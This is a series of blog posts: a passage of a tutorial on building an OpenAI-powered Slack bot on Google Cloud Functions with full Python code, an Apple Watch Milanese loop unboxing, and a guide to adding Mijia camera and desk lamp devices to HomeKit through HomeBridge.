+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese used in Taiwan, and it must conform to common usage in Taiwan."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD if you answer well."}
+ ]
+
+ if eventThreadTS is not None:
+ threadMessages = slackGetReplies(eventTS, eventThreadTS)
+ if threadMessages is not None:
+ for threadMessage in threadMessages:
+ appID = None
+ if 'app_id' in threadMessage:
+ appID = threadMessage['app_id']
+ threadMessageText = threadMessage['text']
+ threadMessageTs = threadMessage['ts']
+ # If it's a Slack App (OpenAI API Response), mark it as assistant
+ if appID and appID == apiAppID:
+ messages.append({
+ "role": "assistant", "content": threadMessageText
+ })
+ else:
+ # Mark the user's message content as user
+ messages.append({
+ "role": "user", "content": threadMessageText
+ })
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions requests
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+
+ # If the message has metadata & metadata event_type == aborted, it means the response has been marked as terminated by the user
+ if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] and response['message']['metadata']['event_type'] == "aborted":
+ result += "...*[Terminated]*"
+ break
+ # If the message has been deleted
+ elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
+ break
+
+ await stream.close()
+
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackGetReplies(channel, ts):
+ endpoint = "/conversations.replies?channel="+channel+"&ts="+ts
+ response = slackRequest(endpoint, "GET", None)
+
+ if response is not None and 'messages' in response:
+ return response['messages']
+ return None
+
+def slackOpenModal(trigger_id, callback_id, text):
+ slackRequest("/views.open", "POST", {
+ "trigger_id": trigger_id,
+ "view": {
+ "type": "modal",
+ "callback_id": callback_id,
+ "title": {
+ "type": "plain_text",
+ "text": "Prompt"
+ },
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": text
+ }
+ }
+ ]
+ }
+ })
+
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.get(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
Back to Slack to test:
At this point, we have built a ChatGPT (via OpenAI API) Slack App Bot.
You can also build on the Slack API and OpenAI API custom instructions to tailor the Cloud Functions Python program to your needs: for example, a channel trained to answer team questions and find project documents, a channel dedicated to translation, a channel dedicated to data analysis, and so on.
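For example, a minimal sketch of how per-channel custom instructions could be wired into openAIRequest — the channel IDs and prompts here are hypothetical placeholders, not part of the original bot:

# Hypothetical mapping of Slack channel IDs to extra system prompts (placeholders).
CHANNEL_INSTRUCTIONS = {
    "C0TRANSLATE": "You are a translator. Reply only with the translated text.",
    "C0TEAMQA": "Answer questions based on our team's project documents and conventions."
}

def channelSystemMessages(eventChannel):
    # Return extra system messages for the given channel, if any are configured.
    extra = CHANNEL_INSTRUCTIONS.get(eventChannel)
    if extra is None:
        return []
    return [{"role": "system", "content": extra}]

# Inside openAIRequest, after building the base messages list (sketch):
# messages += channelSystemMessages(eventChannel)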
First, add the app_mention Event Subscription. After adding it, click “Save Changes”, then “reinstall your app” to complete the change.
In the main.py program above, add a new Event Type check to the # Handle Event Subscriptions Events… code block:
# Mention Event (@SlackApp hello)
+ if eventType == 'app_mention':
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content, remove the leading tag string <@SLACKAPPID>
+ eventText = re.sub(r"<@\w+>\W*", "", request_json['event']['text'])
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Parent message TS of the event message thread (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
After redeploying, the change takes effect.
Messages sent by a Slack App cannot be deleted directly in Slack. Following the “Stop OpenAI API Response” Shortcut approach above, you can add a “Delete Message” Shortcut.
Then, in the Cloud Functions main.py, add a callback_id check to the # Handle Shortcut code block: if it equals the “delete message” Callback ID you defined, pass the parameters to the following method to delete the message (the handler branch is sketched after the method):
def slackDeleteMessage(channel, ts):
+ endpoint = "/chat.delete"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
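For reference, the added branch inside the # Handle Shortcut code block could look like the following sketch; it mirrors the abort_openai_api branch above, and "delete_message" stands for whatever Callback ID you registered for the new Shortcut:

if callbackID == "delete_message":
    slackDeleteMessage(channel, ts)
    if triggerID is not None:
        slackOpenModal(triggerID, callbackID, "Successfully deleted Slack App message!")
    return ("OK!", 200, headers)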
SAFE_ACCESS_TOKEN = "nF4JwxfG9abqPZCJnBerwwhtodC28BuC"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+ # Verify if the token parameter is valid
+ if not(request_args and 'token' in request_args and request_args['token'] == SAFE_ACCESS_TOKEN):
+ return ('', 400, headers)
+
Different regions, CPU, RAM, capacity, traffic… have different prices. Please refer to the official pricing table.
The free tier is as follows: (2024/02/15)
Cloud Functions offers a permanent free tier for compute time resources,
+including allocations of GB-seconds and GHz-seconds. In addition to 2 million invocations,
+this free tier also provides 400,000 GB-seconds and 200,000 GHz-seconds of compute time,
+and 5 GB of internet data transfer per month.
+
+The usage quota of the free tier is calculated in equivalent USD amounts at the above tier 1 prices.
+Regardless of whether the function execution region uses tier 1 and/or tier 2 prices, the system will allocate the equivalent USD amount to you.
+However, when deducting the free tier quota, the system will use the tier (tier 1 or tier 2) of the function execution region as the standard.
+
+Please note that even if you are using the free tier, you must have a valid billing account.
+
btw. Slack App is free, you don’t necessarily need Premium to use it.
Setting aside slow responses during OpenAI API peak times, if the bottleneck is the Cloud Function itself, you can scale up the settings on the first page of the Cloud Function editor:
You can adjust CPU, RAM, Timeout time, Concurrent number… to improve request processing speed.
*But it may incur additional costs
Click “Test Function” to open a Cloud Shell window in the bottom toolbar. Wait about 3–5 minutes (the first startup takes longer), and after the build is completed and the following authorization is agreed upon:
Once you see “Function is ready to test,” you can click “Run Test” to execute the method for debugging.
You can use the “Triggering event” block on the right to input a JSON body that will be passed in as the request_json parameter, or directly modify the program to inject a test object — for example, something like the sketch below.
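For reference, a minimal test body for a plain channel message might look like this sketch; all IDs are placeholders, and only the fields that hello_http actually reads are included (you can paste it as JSON in the “Triggering event” field, or assign it to request_json as a test object in code). Note that the token check reads the query string, so a console test may also need the token relaxed or injected separately, as mentioned above.

# Hypothetical "Triggering event" body for a new channel message (placeholder IDs).
test_event = {
    "type": "event_callback",
    "api_app_id": "A00000000",
    "event": {
        "type": "message",
        "user": "U00000000",
        "channel": "C00000000",
        "text": "Hello, bot!",
        "event_ts": "1700000000.000100"
    }
}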
*Please note that Cloud Shell/Cloud Run may incur additional costs.
It is recommended to run a test before deploying (Deploy) to ensure that the build can succeed.
If you accidentally write broken code and the Cloud Function deploy build fails, an error message will appear. If you then click “EDIT AND REDEPLOY” to return to the editor, you will find that the code you just changed is gone!!!
No need to worry, at this point, click “Source Code” on the left and select “Last Failed Deployment” to restore the code that just Build Failed:
You can use print to write runtime logs and view them in Logs. *Please note that Cloud Logging and querying logs may incur additional costs.
The complete main.py:
import functions_framework
+import requests
+import re
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# Custom defined security verification Token
+# The URL must carry the ?token=SAFE_ACCESS_TOKEN parameter to accept the request
+SAFE_ACCESS_TOKEN = "nF4JwxfG9abqPZCJnBerwwhtodC28BuC"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # Shortcut events will be given from the post payload field
+ # https://api.slack.com/reference/interaction-payloads/shortcuts
+ payload = request.form.get('payload')
+ if payload is not None:
+ payload = json.loads(payload)
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ # print(payload)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within Slack's 3-second limit
+ # Additionally, it takes a certain amount of time for the OpenAI API to respond (depending on the response length, it may take up to 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This will cause repeated requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack that even if it does not receive a response within the time limit, it does not need to retry
+ headers = {'X-Slack-No-Retry':1}
+
+ # Verify if the token parameter is valid
+ if not(request_args and 'token' in request_args and request_args['token'] == SAFE_ACCESS_TOKEN):
+ return ('', 400, headers)
+
+ # If it is a Slack Retry request...ignore
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ apiAppID = None
+ if 'api_app_id' in request_json:
+ apiAppID = request_json['api_app_id']
+ # If the event source is the App and the App ID == Slack App ID, it means the event was triggered by its own Slack App
+ # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'app_id' in request_json['event'] and apiAppID == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, for example: message (related to messages), app_mention (mentioned)....
+ eventType = request_json['event']['type']
+
+ # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have a Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ # Message type Event
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, replied to...
+ # Ignore and do not process
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content
+ eventText = request_json['event']['text']
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Event message thread parent message TS (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+ # Mention type Event (@SlackApp hello)
+ if eventType == 'app_mention':
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content, remove the leading tag string <@SLACKAPPID>
+ eventText = re.sub(r"<@\w+>\W*", "", request_json['event']['text'])
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Event message thread parent message TS (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ # Handle Shortcut (message)
+ if payload and 'type' in payload:
+ payloadType = payload['type']
+
+ # If it is a message Shortcut
+ if payloadType == 'message_action':
+ callbackID = None
+ channel = None
+ ts = None
+ text = None
+ triggerID = None
+
+ if 'callback_id' in payload:
+ callbackID = payload['callback_id']
+ if 'channel' in payload:
+ channel = payload['channel']['id']
+ if 'message' in payload:
+ ts = payload['message']['ts']
+ text = payload['message']['text']
+ if 'trigger_id' in payload:
+ triggerID = payload['trigger_id']
+
+ if channel is not None and ts is not None and text is not None:
+ # If it is a stop OpenAI API response Shortcut
+ if callbackID == "abort_openai_api":
+ slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": { }}, text)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response!")
+ return ("OK!", 200, headers)
+ # If it is a delete message
+ if callbackID == "delete_message":
+ slackDeleteMessage(channel, ts)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully deleted Slack App message!")
+ return ("OK!", 200, headers)
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to a colleague (https://twitter.com/je_suis_marku) for support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese and English"},
+ {"role": "system", "content": "I do not understand Simplified Chinese"},
+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese, and it must conform to common Taiwanese usage."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
+ ]
+
+ if eventThreadTS is not None:
+ threadMessages = slackGetReplies(eventChannel, eventThreadTS)
+ if threadMessages is not None:
+ for threadMessage in threadMessages:
+ appID = None
+ if 'app_id' in threadMessage:
+ appID = threadMessage['app_id']
+ threadMessageText = threadMessage['text']
+ threadMessageTs = threadMessage['ts']
+ # If it is a Slack App (OpenAI API Response), mark it as assistant
+ if appID and appID == apiAppID:
+ messages.append({
+ "role": "assistant", "content": threadMessageText
+ })
+ else:
+ # User's message content marked as user
+ messages.append({
+ "role": "user", "content": threadMessageText
+ })
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may cause failures or waste Cloud Functions request counts
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+
+ # If the message has metadata & metadata event_type == aborted, it means this response has been marked as terminated by the user
+ if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] and response['message']['metadata']['event_type'] == "aborted":
+ result += "...*[Terminated]*"
+ break
+ # The message has been deleted
+ elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
+ break
+
+ await stream.close()
+
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackGetReplies(channel, ts):
+ endpoint = "/conversations.replies?channel="+channel+"&ts="+ts
+ response = slackRequest(endpoint, "GET", None)
+
+ if response is not None and 'messages' in response:
+ return response['messages']
+ return None
+
+def slackOpenModal(trigger_id, callback_id, text):
+ slackRequest("/views.open", "POST", {
+ "trigger_id": trigger_id,
+ "view": {
+ "type": "modal",
+ "callback_id": callback_id,
+ "title": {
+ "type": "plain_text",
+ "text": "Prompt"
+ },
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": text
+ }
+ }
+ ]
+ }
+ })
+
+def slackDeleteMessage(channel, ts):
+ endpoint = "/chat.delete"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.get(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
requirements.txt:
functions-framework==3.*
+requests==2.31.0
+openai==1.9.0
+
OAuth & Permissions
Interactivity & Shortcuts
https://us-central1-xxx-xxx.cloudfunctions.net/SlackBot-Rick-C-137?token=nF4JwxfG9abqPZCJnBerwwhtodC28BuC
App Home
Basic Information
Rick & Morty 🤘🤘🤘
If you and your team have automation tool and process integration needs, whether it’s Slack App development, Notion, Asana, Google Sheet, Google Form, GA data, various integration needs, feel free to contact for development.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Apple Original Stainless Steel 44mm Graphite Milanese Loop Unboxing
Following the previous post “Apple Watch Series 6 Unboxing & Two Years Usage Review”, I finally decided to get the original Milanese loop. I had wanted to buy it two years ago but never did; this time, I decided to update everything at once. Apple guarantees that the bands are compatible with all subsequent Apple Watch versions, so there’s no worry about the band not fitting future updates.
The Milanese loop is made of stainless steel mesh and a magnetic clasp. The benefits of the stainless steel mesh are breathability and quick drying; the magnetic clasp allows the band to be adjusted to any position, fits the wrist better, is easy to wear, and has strong magnetism, so it won’t fall off. Most importantly, it makes the Apple Watch look more formal and easier to match with outfits.
It pulls hair, pulls hair, pulls hair, and is relatively heavy.
Having been in Apple communities for a while, I’ve noticed that the most frequently asked question is about the original vs. third-party Milanese loop. Personally, I think the difference is not significant, mainly in the details and craftsmanship. The original also pulls hair, but the original’s weaving is very delicate and integrated, the magnetic part is very strong and won’t loosen, and it’s clean and skin-friendly without a rusty smell. However, the price difference is several times (the original costs $3,100). It’s best to touch the actual product before deciding. I guess third-party Milanese loops costing 1-2 thousand should almost equal the original in craftsmanship.
As mentioned in the previous post, it’s recommended for those with smaller wrists to buy the Apple Watch 40mm, as the 40mm Milanese loop fits wrists 130–180mm, compared to the 44mm Milanese loop, which fits wrists 150–200mm, 20mm shorter.
The band is one-piece and cannot be adjusted in length; if the band is already tight but still too big, you can only consider third-party options, or gain some weight (?). So it’s safer to try it on in-store.
A friend’s case: wrist too small, bought the 44mm with the Milanese loop; the clasp can only attach at the very end and it’s still a bit loose!
* Purchased on 2020/11/01 at Apple Store 101 flagship store.
Same simple paper packaging
Back of the packaging
Now it’s not called Space Gray, but Graphite.
Contents
Similar to the original silicone band, but the difference is that it doesn’t come with an extra short band XD
The band itself
Magnetic clasp
Magnetic clasp, can attach at any position, adjust the loop size freely
Installation instructions
The side with the magnet goes down and is buckled into the Apple Watch body.
Don’t be like me and install it backwards at first without realizing it, although it doesn’t really matter? :
Correct version! Done!
Wearing picture - back
Wearing picture - front
*Simple way to distinguish between original and aftermarket Milanese straps, but not necessarily accurate; purchasing through legitimate channels ensures you won’t be scammed!
Connection end - the end near the magnetic clasp — bottom — has “Assembled in China” text
Connection end other end — surface — has “44MM” text
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Mijia Smart Camera and Mijia Smart Desk Lamp, Homekit Setup Tutorial
[2020/04/20] Advanced Tutorial Released : Experienced users please proceed directly to the advanced tutorial>> Demonstration of using Raspberry Pi as HomeBridge host to connect all Mijia appliances to HomeKit
I recently moved; unlike my previous place where the ceiling had office-style light fixtures that were too bright, the new place has decorative reflective lights that are a bit dim for using the computer or reading. After two weeks, my eyes felt more dry and uncomfortable. Initially, I planned to shop at IKEA, but considering the light color and eye protection, I ultimately chose Xiaomi desk lamps (since I already had a Xiaomi smart camera, all part of the Mijia series).
I didn’t particularly check if the products supported Apple HomeKit when purchasing, which is quite a failure as an iOS developer because I didn’t expect Xiaomi to support it.
So, this article will separately introduce Apple HomeKit usage, how to use third-party connections for smart home devices that do not support Apple HomeKit, and how to set up a smart home using Mijia itself (with IFTTT).
You can skip to the sections that suit your device needs.
I bought two desk lamps, one (Pro) for the computer desk and the other for the bedside as a reading lamp.
NT$ 1,795 supports Mijia, Apple HomeKit
NT$ 995 only supports Mijia
For detailed introductions, refer to the official website. Both lamps support smart control, color change, brightness adjustment, and eye protection. The Pro version supports Apple HomeKit and three-angle adjustments. So far, I am quite satisfied with the functionality of one lamp. If I had to pick a flaw, it would be that the Pro version’s angle adjustment only allows the base to rotate horizontally, not the lamp itself, which means you can’t adjust the light angle!
When returning home: Automatically turn off the camera (for privacy and to prevent false alarms, as the Mijia app has a bug where the home security alarm cannot be turned on/off according to the set time), and turn on the Pro lamp on the computer desk (to avoid fumbling in the dark). When leaving home: Automatically turn on the camera (default to home security mode) and turn off all lights.
Receive push notifications when leaving or returning home, and trigger operations with a single tap on the phone (with the current devices, it’s not possible to achieve the ideal automation goal).
*Only for Mijia Desk Lamp Pro! Mijia Desk Lamp Pro! Mijia Desk Lamp Pro!
This is the simplest part because it’s all native functionality.
Only four steps
After successfully adding the accessory, press hard (3D TOUCH) / long press on the accessory to adjust the brightness and color.
Apart from the smart devices that support Apple HomeKit, does it mean that devices that do not support Apple HomeKit cannot be controlled through the Home app at all? This section will guide you step-by-step on how to add unsupported devices (cameras, regular desk lamps) to the “Home” app!
Mac ONLY, Windows users please skip to the section on using Mi Home
My device is MacOS 10.14/iOS 12
Using HomeBridge:
HomeBridge uses a Mac computer as a bridge to simulate unsupported devices as HomeKit devices, allowing them to be added to the “Home” accessories.
Operation Comparison
One key point is that you need to keep a Mac computer on to maintain the bridge channel smoothly; once the computer is turned off or goes to sleep, you will not be able to control those HomeKit devices.
Of course, there are also advanced methods online where people buy a Raspberry Pi to use as a bridge; however, this involves too much technical detail and will not be covered in this article.
If you are aware of the drawbacks and still want to try, you can continue reading or skip to the next section on using Mi Home directly.
Step 1:
Install node.js: Click here to download and install it.
Step 2:
Open “Terminal” and enter
sudo npm -v
+
Check if the node.js npm package manager is installed successfully: if the version number is displayed, it means success!
Step 3:
Install the HomeBridge package via npm:
sudo npm -g install homebridge --unsafe-perm
+
After the installation is complete… the HomeBridge tool is installed!
As mentioned earlier, “HomeBridge uses a Mac computer as a bridge to simulate unsupported devices as HomeKit devices,” HomeBridge is just a platform, and each device needs to find additional HomeBridge plugin resources to be added.
It’s easy to find, just google or search on GitHub for “Mi Home product English name homebridge” and you will find many resources; here are two resources for devices I use:
1. Mi Home Camera Pan-Tilt Version Resource: MijiaCamera
Cameras are relatively tricky devices, and I spent some time researching and organizing this; I hope it helps those in need!
First, use “Terminal” to install the MijiaCamera npm package with the command
sudo npm install -g homebridge-mijia-camera
+
After installation, we need to obtain the camera’s network IP address and Token information.
Open the Mi Home APP → Camera → Top right corner “…” → Settings → Network Information to get the IP address!
Token information is more troublesome and requires you to connect your phone to the Mac:
Open the iTunes interface.
In the backup settings, do not check “Encrypt local backup”, and click “Back Up Now.”
After the backup is complete, download and install the backup viewing software: iBackupViewer
Open “iBackupViewer”. The first time you launch it, you will need to go to Mac “System Preferences” -> “Security & Privacy” -> “Privacy” -> “+” -> Add “iBackupViewer”. *If you have privacy concerns, you can disable the network while using this software and remove it after use.
Open “iBackupViewer” again. After successfully reading the backup file, click the top right corner to switch to “Tree View” mode.
On the left side, you will see all the installed apps. Find the Mi Home app “AppDomain-com.xiaomi.mihome” -> “Documents”.
In the document list on the right, find and select the file “number_mihome.sqlite”.
Click the top right corner “Export” -> “Selected”.
Drop the exported sqlite file into https://inloop.github.io/sqlite-viewer/ to view the content.
You can see all the device information fields on the Mi Home app. Scroll to the far right end to find the ZTOKEN field. Double-click to edit, select all, and copy.
Finally, open http://aes.online-domain-tools.com/ to convert ZTOKEN into the final Token.
As for the Token: I tried sniffing it directly with “miio”, but it seems the Mi Home camera firmware has been updated and this quick, convenient method no longer works!
Back to HomeBridge! Edit the config file config.json:
Use “Finder” -> “Go” -> “Go to Folder” -> enter “~/.homebridge” to go there.
Open “config.json” with a text editor. If this file does not exist, create one yourself or click here to download and place it directly.
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"",
+ "token":""
+ }
+ ]
+}
+
Add the above content to config.json, and input the IP and Token obtained earlier.
Then, go back to the “Terminal” and enter the following command to start HomeBridge:
sudo homebridge start
+
If you have already started it and then changed the config.json content, you can use:
sudo homebridge restart
+
Restart
At this point, a HomeKit QRCode will appear for you to scan and add accessories (steps as mentioned above, the way to add Apple HomeKit devices).
Below will also have status messages: [2019–7–4 23:45:03] [Mi Camera] connecting to camera at 192.168.0.100… [2019–7–4 23:45:03] [Mi Camera] current power state: off
If you see these and no error messages appear, it means the setup is successful!
The most common error is usually an incorrect Token. Just check if there are any omissions in the above process.
Now you can turn the Mi Home Smart Camera on and off from the “Home” APP!
2. Mi Home LED Smart Desk Lamp HomeBridge Resource: homebridge-yeelight-wifi
Next is the Mi Home LED Smart Desk Lamp. Since it does not support Apple HomeKit like the Pro version does, we still need to add it via HomeBridge. The steps are simpler than the camera’s (no cumbersome IP/Token retrieval), but the desk lamp has its own pitfall: you need to pair it with the separate Yeelight APP first and then enable the local network control setting:
I have to complain about this poor integration; the native Mi Home APP cannot make this setting. So please search for the “ Yeelight “ APP in the APP Store to download and install it.
Open the APP -> Log in directly using the Mi Home account -> Add device -> Mi Home Desk Lamp -> Follow the instructions to rebind the desk lamp to the Yeelight APP.
After the device is bound, go back to the “Device” page -> Click “Mi Home Desk Lamp” to enter -> Click the bottom right “△” Tab -> Click “Local Network Control” to enter the settings -> Turn on the button to allow local network control.
The desk lamp setup is complete here. You can keep this APP to control the desk lamp or rebind it back to Mi Home.
Next is the HomeBridge setup; similarly, open the “Terminal” and enter the command to install the homebridge-yeelight-wifi npm package
sudo npm install -g homebridge-yeelight-wifi
+
After installation, follow the same steps as the camera, go to the ~/.homebridge folder, create or edit the config.json file, and this time just add the following inside the last }:
"platforms": [
+ {
+ "platform" : "yeelight",
+ "name" : "yeelight"
+ }
+ ]
+
That’s it!
Finally, combine the above camera config.json file as follows:
{
+ "bridge": {
+ "name": "Homebridge",
+ "username": "CC:22:3D:E3:CE:30",
+ "port": 51826,
+ "pin": "123-45-568"
+ },
+
+ "accessories": [
+ {
+ "accessory": "MijiaCamera",
+ "name": "Mi Camera",
+ "ip": "",
+ "token": ""
+ }
+ ],
+
+ "platforms": [
+ {
+ "platform" : "yeelight",
+ "name" : "yeelight"
+ }
+ ]
+}
+
Then go back to the “Terminal” and enter:
sudo homebridge start
+
or
sudo homebridge restart
+
You will see the unsupported Mi Home LED Smart Desk Lamp added to the HomeKit “Home” APP!
